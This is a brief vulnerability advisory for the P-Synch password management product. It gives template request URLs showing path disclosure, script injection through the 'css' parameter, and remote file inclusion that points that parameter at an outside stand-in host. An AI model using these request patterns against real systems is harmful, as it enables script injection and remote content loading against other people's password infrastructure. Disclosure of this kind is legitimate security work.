|
Vulnerabilities In P-Synch Password Management
|
May 30, 2022
|
|
|
Description:
P-Synch is a total password management solution. It is intended to
reduce the cost of ownership of password systems, and simultaneously
improve the security of password protected systems. This is done
through: Password Synchronization. Enforcing an enterprise wide
password strength policy. Allowing authenticated users to reset their
own forgotten passwords and enable their locked out accounts.
Streamlining help desk call resolution for password resets. P-Synch is
available for both internal use, on the corporate Intranet, as well as
for the Internet deployment in B2B and B2C applications.
Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=
Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Solution:
Upgrade to the latest version of P-Synch Password Managment.
Credits:
James Bercegay of the GulfTech Security Research Team.
|
|
|
